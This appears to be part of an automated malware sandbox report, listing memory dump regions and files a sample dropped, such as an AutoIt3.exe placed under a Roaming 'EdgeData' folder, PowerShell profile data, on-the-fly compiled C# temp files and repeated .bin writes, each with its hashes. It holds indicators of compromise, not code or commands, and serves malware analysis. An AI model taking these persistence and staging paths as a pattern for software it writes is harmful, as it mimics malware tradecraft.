SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/620-151-0x0000000000BE0000-0x0000000000BED000-memory.dmp

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/620-154-0x0000000000BE0000-0x0000000000BED000-memory.dmp

memory/4728-155-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

memory/4728-156-0x0000000002295000-0x0000000002297000-memory.dmp

memory/4728-157-0x0000000006170000-0x00000000061A2000-memory.dmp

memory/4728-158-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/4728-159-0x0000000006140000-0x000000000615E000-memory.dmp

memory/4728-160-0x00000000074F0000-0x0000000007B6A000-memory.dmp

memory/4728-161-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

memory/4728-162-0x000000007F700000-0x000000007F701000-memory.dmp

memory/4728-163-0x0000000006F20000-0x0000000006F2A000-memory.dmp

memory/4728-164-0x0000000007130000-0x00000000071C6000-memory.dmp

memory/4728-165-0x00000000070E0000-0x00000000070EE000-memory.dmp

memory/4728-166-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/4728-167-0x00000000071D0000-0x00000000071D8000-memory.dmp

memory/1328-168-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/1328-169-0x0000000002F10000-0x0000000002F11000-memory.dmp

memory/1328-170-0x0000000002F12000-0x0000000002F13000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cf49541f85a11a6dae4e6633f2af97f5
SHA1 190e951e1e830d26db6164774ef4a2b895ea53c0
SHA256 7007b9b332b458192338a82881c4cb3e923dcb16c971e7ab53148fbc402f8e61
SHA512 87b0ebb799854ed78d61a83af2933b7d78967dc8fb6e9f19e86448337815cf8227801e71fd958d5f6d79800dcab602a9d78ab53c2298ae155410e83f4b02935c

memory/1328-172-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/1328-173-0x0000000002F15000-0x0000000002F17000-memory.dmp

memory/1328-174-0x000000007FC40000-0x000000007FC41000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a371f763359e1f378dd59d4d73fc22ba
SHA1 eaa73c31c9ec87fa0b905a7adf31ef7ca96827de
SHA256 c2e23afd164872ebf5161f81aaaf498158500df3e005ebe8debbd864b75c2382
SHA512 a23bf93828de09ca2d7cd4605b352b8442498ecca1b8de7e551d4bd57e6f5c26ef5062ddc5ff38771a00d032b21307f7c0a3514c0fec6640280b0e45eb71f499

memory/4328-176-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4328-177-0x0000000002A90000-0x0000000002A91000-memory.dmp

memory/4328-178-0x0000000002A92000-0x0000000002A93000-memory.dmp

memory/4328-179-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/4328-180-0x0000000002A95000-0x0000000002A97000-memory.dmp

memory/4328-181-0x000000007F2A0000-0x000000007F2A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbc28b68bc254b88c6311d1a9b608c59
SHA1 90630652a711d5bab18bb02d5378ea04d49b6fb2
SHA256 750f2bdbd645d5145d1988eab7ef9ac7da7b815b37e4d5ffe4e10a561ec35d74
SHA512 1252b0707d8adaa0f803b65e5364e2c74be2d6bbe58303ce15a07eddaa9392425dcaba8e45e13ea593aba73e2a1f53d00ba6001be37d847aaa3af6a66a857cf8

memory/4800-183-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4800-184-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/4800-185-0x0000000004E02000-0x0000000004E03000-memory.dmp

memory/4616-187-0x0000019B0AE40000-0x0000019B0AE62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 237850810567818bfdee54350f48141e
SHA1 ac6a7601a9eefabd346406d317dba9bea2a7aa06
SHA256 b3158ef56b5e405e5bcd4ac4f1d2267898e36ed847b920657d06364d48438dde
SHA512 c4522e8cf92b7aaff1bd86ed95d285d114cdd4206c6a75b274a63e284f96191178f78514653b1f8d8fbe6533c7e8e44310525e980125a2f0e3fbc5f5ff5f998e

memory/4616-189-0x00007FF836710000-0x00007FF8371D1000-memory.dmp

memory/4616-190-0x0000019B23350000-0x0000019B23352000-memory.dmp

memory/4616-191-0x0000019B23353000-0x0000019B23355000-memory.dmp

memory/4616-192-0x0000019B23356000-0x0000019B23358000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline

MD5 a547b9b3cc1f4df2859b7a9bd7931a3f
SHA1 765ce8dab4c1d51b5ca67751a573684dbe584b06
SHA256 f8b02bf1ddca39c1756e877571c3e2ec5858b1da2cd8db8613496d73311b09f6
SHA512 09d91adc8acb556e70a7abaeaa2b0c2628e6735c49879b7e9dd12dd97c3c2b6518229c01b9f4ef6d41d693c82f8cf40ca003366f3de957215f8f2fd68b10c745

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.0.cs

MD5 0b7537cf8128ca1320d7bf219bb65b46
SHA1 33ca68f06067df84baa078137f1285102d30cb3a
SHA256 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8
SHA512 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP

MD5 11fe82b214cc2286a43d10efd56e1152
SHA1 f60a607b4b28be7c2d8d17e5c6f91b1a155f0f96
SHA256 2c692831adb728646664bfe08a7f878b1fe7ff05e94cc4b3f77c90d1ea4dd532
SHA512 6f435fc2627a40934bc6bc70df79a4dede52d187badbce0821a70789c1bf19a5c6fa77017266a45cdd48bb4dab35be1e40097819b791a7cc548fa31cdf7dd977

C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp

MD5 67213eb2dd60ef8b67fc8b70a01cfb25
SHA1 0095dbc594e164188eaaa4a307bbe6488ad10744
SHA256 75d3b38869f3eaa6238dcf6e35591c85e903890b5707b0826ffe0f296ebd0854
SHA512 b7a7aa77a03c7112e2ea9d27d6218662c0903884a0075ad29c1b2e5258d063c7435da1b02c187a08ee1daabb1901da46fcce29fed2eea9221353a211fedd17f7

C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.dll

MD5 66eb8a277649a024943f56832a90e181
SHA1 d8e85394c1782bffe9cc06b2a9b1497308cfa7dc
SHA256 83cbedef1cacc6c3b87530242e635dc0adf9b3bd07b542c441cf42136401414f
SHA512 8f53510c9bd3e3ab8ce7e1ec5bf68e27c54cbef08ed10ef7a76f1164b05a81982a63a234403e20ba98d3099424f0816135cb84ccdac4e663048147d6c9d4c6cd

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline

MD5 8b53a3921ddf8071130e25193508854a
SHA1 2d1d6cbbc991e87bcedad744f6a6b1ed45081588
SHA256 76280f88d11ea214a977fbc58c8b7de851c68bce0ee46d374c49692993ac160e
SHA512 650ddb7c90c832f132073a9a554a85f23fb5873cd787399328a726b6252136310394f67a63efbade3edc4b257f1b144587b9038f544883967e2673f56817e6df

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.0.cs

MD5 35b3f48ba529849ae98e5f2c89b802f6
SHA1 e6ac7f0dff73e320ab7c09f5abb45dede87cfe81
SHA256 f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61
SHA512 b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP

MD5 8e496206090242e39f6271276296462b
SHA1 07f828f2508306960880a50f1ed92cf329145216
SHA256 bafb4cc80f81fbe6e279eb6fe459a593e1db25a1dfe00e6957900eaa3fd1f3e8
SHA512 96d99695374bc8fe0facfcde5e04b3a4207f785324d44e992b42df009d5e0cef308c6e61fc07af340c3f044d315cb51d3df9c3c2962a1d7d8e5c5ba54a736d4c

C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp

MD5 f39a7ba4865db23805f3ab18e4a8b044
SHA1 223f41b79dc26bedc3aa4178cf6c0e1ccefe63a5
SHA256 034831ee6eca869f112c97711e0f11db36569623040c9fa33f93bb6fd0a7a778
SHA512 2a787b7df3a7b3442c10f5f164fecaa2d51a475d79b423b63cace78924f35b07ad46426ad5bf8748548448b6200148522ef2848a5dcfb9af7318b9dbef102082

C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.dll

MD5 f53b6c79d1eb91d140ad67c4a638427e
SHA1 6358f57c5c334fb862252ac68ace0bdd0913ee73
SHA256 c3c0954a791a8d36e3d20685876b03a3afcf540ad91ca510ddb876b1af9bdb5e
SHA512 c9688e618c361156965ecd14131b263c292f3c91af4603d604096129250fecc71a8c80f5300b2b280960361c1890da599630c573543a773c199668667a5bd16c

memory/4616-203-0x0000019B235D0000-0x0000019B23614000-memory.dmp

memory/1048-204-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1048-205-0x00000000085A0000-0x0000000008625000-memory.dmp

memory/5004-206-0x0000025D7B650000-0x0000025D7B651000-memory.dmp

memory/5004-207-0x0000025D7B890000-0x0000025D7B915000-memory.dmp

memory/3440-208-0x0000028157CE0000-0x0000028157CE1000-memory.dmp

memory/3440-209-0x0000028157C50000-0x0000028157CD5000-memory.dmp

memory/3740-210-0x00000226779F0000-0x00000226779F1000-memory.dmp

memory/3740-211-0x0000022678C70000-0x0000022678CF5000-memory.dmp

memory/2144-212-0x000001C3239F0000-0x000001C3239F1000-memory.dmp

memory/3428-214-0x0000024B82780000-0x0000024B82781000-memory.dmp

memory/2144-213-0x000001C323B10000-0x000001C323B95000-memory.dmp

memory/3428-215-0x0000024B83090000-0x0000024B83115000-memory.dmp

memory/392-217-0x000001399C2B0000-0x000001399C335000-memory.dmp

memory/392-216-0x000001399A600000-0x000001399A601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34A2.bi1

MD5 82f12896705faeb1630b62f16d5f5cc8
SHA1 9ed376a84dd777c28d4510cd747da4fbbc2ff63b
SHA256 caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e
SHA512 e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379

C:\Users\Admin\AppData\Local\Temp\34A2.bi1

MD5 41a49d1a2a3a8713a12ccf89932d4bb7
SHA1 b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287
SHA256 f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe
SHA512 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 2fbcc0fe1378d0ecf1b16a2afd880379
SHA1 6d4b4dba0c4e745dee18ec08f26a438484806919
SHA256 9b2a25150cdfabd658312ca8f336dbae5088de792e5913a7a7285c898278a3b5
SHA512 6861298e070a56787c9be3d5af0ead74a4fcf2cb73f72538eebbfac03cdff87980de015686e631c546ce8b9ce1a4ff97156321500eb02b4ef7fbf9bf84cfe681

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 6359f1d7f512af3445b3f5982383fbd1
SHA1 d1a92ef7c4d8da438053fc22d95e7ea45074beb7
SHA256 4ccc79cb5e7d191276a81b1a64562ebf0b317525aa93964b9f656cf08ff1c4f8
SHA512 67d58a272a30e50e8ee6dedf0e202b056062a76ea80dbfb9a83af736d4e7d5b1b9d6e9cf8481cd8d6a362f298eeeeff2894f516d4b2278bb4ff42e267881f1cf

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 994674047487a307683fe927db53a879
SHA1 08e266107bc3096bb9376853666eed498cf09343
SHA256 9efdf86207323dbd235b7917b57f84a3fdb2616378d51097ac03784624e6429f
SHA512 d4681aea5c3c7fa9d84773bf56e3542878c408154b84a15135f7ef2e7c5d8684949b071b5c120dbc2e81ab3eddee13543ae4c32118df82c868494a20fb1c5695

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 16b2f1ac1c08558ef924f916fc1973f0
SHA1 14c1532ccc9fb0b08e91cfcde25e1943daf1ba15
SHA256 51b0ac653327833065b870931c0ca2b7fce35a4f3d1483dfaa7931c7cae01412
SHA512 4cd107a94140eaec7981097e6e0776be4a58431000a24d27c7670aabbdf1d31c36c451c7e264a0193fbcd0dd407edf3696bce6b3820625b65d6f9484ddc802a4

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 0e83ad975b02ea40288c7351d91965d8
SHA1 b7a4a38d4cce12929988ceec678472ab68d05aa6
SHA256 7e17a7b1b26856ed724c1a28e6b73bfc786b53ff506bcf03629a25c30079509b
SHA512 e13caf92517d1808a1e44e9a950e630edfcfba28e6a4eef4ea72688f86e8de388aeb5a4ce7f605c034e4036e9daebb90cb1be08ac1163daa7b26dcdffcaad7dd

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 339dd554d102558290e2de76f5a60d8d
SHA1 b7f24902c9160a62538da4b1a3ad06a75e499846
SHA256 eb6545f7acab620335c3b48b85f1be8af2feba646f255c54584464a515aebdaf
SHA512 a1a4b95a5b6a14da2fa75d4491d049571301e349c56427846d5917accd49a668746292366662d89c559fa7cdd0f0c10a1d839fe34ec9d33fe6851680e8f31509

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 339dd554d102558290e2de76f5a60d8d
SHA1 b7f24902c9160a62538da4b1a3ad06a75e499846
SHA256 eb6545f7acab620335c3b48b85f1be8af2feba646f255c54584464a515aebdaf
SHA512 a1a4b95a5b6a14da2fa75d4491d049571301e349c56427846d5917accd49a668746292366662d89c559fa7cdd0f0c10a1d839fe34ec9d33fe6851680e8f31509

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 160c46580d921a3cf99e8ced6ffa8b08
SHA1 0b58056c96ada4476edb8aa27b2e4d7d67e36784
SHA256 ecaa7f10ef1ba9c6dbfaa4a2cd5e7aa3f59c9998dada43f0acd5ee1f922e7d1c
SHA512 a54c1b8a1a0f893780578c38a6f5c0efd1233fc1c73ed89f324f6b927bfc8002929e52d7318ebbc657d2d372980a02200856fb0e95e4db29311bdd965e40effd

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 160c46580d921a3cf99e8ced6ffa8b08
SHA1 0b58056c96ada4476edb8aa27b2e4d7d67e36784
SHA256 ecaa7f10ef1ba9c6dbfaa4a2cd5e7aa3f59c9998dada43f0acd5ee1f922e7d1c
SHA512 a54c1b8a1a0f893780578c38a6f5c0efd1233fc1c73ed89f324f6b927bfc8002929e52d7318ebbc657d2d372980a02200856fb0e95e4db29311bdd965e40effd

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 107957a84d34fb483c5d57a4b209390e
SHA1 bc85cf55d36b73cf2da81a6155f08fe83dd73706
SHA256 d5dbe818aacd7c39001bd0c9859c0dd95f3de5062c9dc52ffad9ec676822be8b
SHA512 6ab6d75fe57ca98ef7c79c567ce2d8b224f2491e2a1caf09a4a60663b39a75cada0ff6a98bb8c46fe6031cae657f4eef538c04566788b347b7c7fbda7900f184

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 107957a84d34fb483c5d57a4b209390e
SHA1 bc85cf55d36b73cf2da81a6155f08fe83dd73706
SHA256 d5dbe818aacd7c39001bd0c9859c0dd95f3de5062c9dc52ffad9ec676822be8b
SHA512 6ab6d75fe57ca98ef7c79c567ce2d8b224f2491e2a1caf09a4a60663b39a75cada0ff6a98bb8c46fe6031cae657f4eef538c04566788b347b7c7fbda7900f184

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 a7cac69d6d46c2a9fb4300603e610a89
SHA1 4e276aac065bd789ac5326ff50f558f4eb8b10ad
SHA256 c483bf2841bb7a46c8695e21984f1c23004b3dcd6c073bf1d1306a31be2ef0e9
SHA512 7413dd4c94a4eefb544302f752296dd24ae9512acff1104157b45ba01a83a190b2a98a5d9ce5fe37f67fe1db2947de4802186b6018ffa46db6d5e62bfc4895b5

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 a7cac69d6d46c2a9fb4300603e610a89
SHA1 4e276aac065bd789ac5326ff50f558f4eb8b10ad
SHA256 c483bf2841bb7a46c8695e21984f1c23004b3dcd6c073bf1d1306a31be2ef0e9
SHA512 7413dd4c94a4eefb544302f752296dd24ae9512acff1104157b45ba01a83a190b2a98a5d9ce5fe37f67fe1db2947de4802186b6018ffa46db6d5e62bfc4895b5

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 aa8a190dfc32b0e52551f5d6916638fd
SHA1 2a0ab8b293dfaf0096ea682fa6ecf892c166e4ec
SHA256 b67f7e023efe63997b626c91a7d2171eeb0d3c4dfc324d03e57003a577851ce6
SHA512 216f351de51d1452cd43fb4a4ec77c8a0107f2970ad84736e9f2338a5fc6f421e9b25cfbbd356204fd9b717ff8defbbda1d480a11bde06576077846b3cedf16e

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 a626bbf47ed8a578753f6660b7bbb529
SHA1 5e07b31adfc002789278bad48be486c175e36ab7
SHA256 05731911f148538e4c7e4fae60b3adddab866063277862eac1eb59e004ab6f28
SHA512 ec855b34df3707d1e22a160b6136ee77874dd38ae7d85284fd3dd25ed3655b776234bd8fdfdfc49b5f37293dfacf2bf943bc4a904e648f1cb47cfee241a2f48c

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 5617c5deb94015ca242993228630629a
SHA1 b15cf94530f6a983f93e5b392acdd622fdcf428e
SHA256 62ab7e8f2ece7ea7644816932fce4d3e2128c6ed6665611d26810a62f0e86a88
SHA512 a6cdfd99942e96369a5b674a1c99e8552339f8a9a068a04b09dbe6fcfe4c34c217cc539f5889859229692ce4c1ba665bcb707d5607374e30c906b89ecf4656e6

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 2d83437387d79f44d862672df4847abc
SHA1 bd43f56c8db76201680ed108d5ab862cc247ca0a
SHA256 3e0619aa8689c05e749f9083656404c93ff8dbf27fd01eb0ba07333f396ab211
SHA512 56f2c8d57d9199cae37267ecbebe477194fbef5697456686a3043ecb8d36eb21718dedbd8d5a42902949c2155125ca5c168fd8fa2cb8ffac2288e0073ae385aa

C:\Users\Admin\AppData\Local\Temp\58E.bin

MD5 2d83437387d79f44d862672df4847abc
SHA1 bd43f56c8db76201680ed108d5ab862cc247ca0a
SHA256 3e0619aa8689c05e749f9083656404c93ff8dbf27fd01eb0ba07333f396ab211
SHA512 56f2c8d57d9199cae37267ecbebe477194fbef5697456686a3043ecb8d36eb21718dedbd8d5a42902949c2155125ca5c168fd8fa2cb8ffac2288e0073ae385aa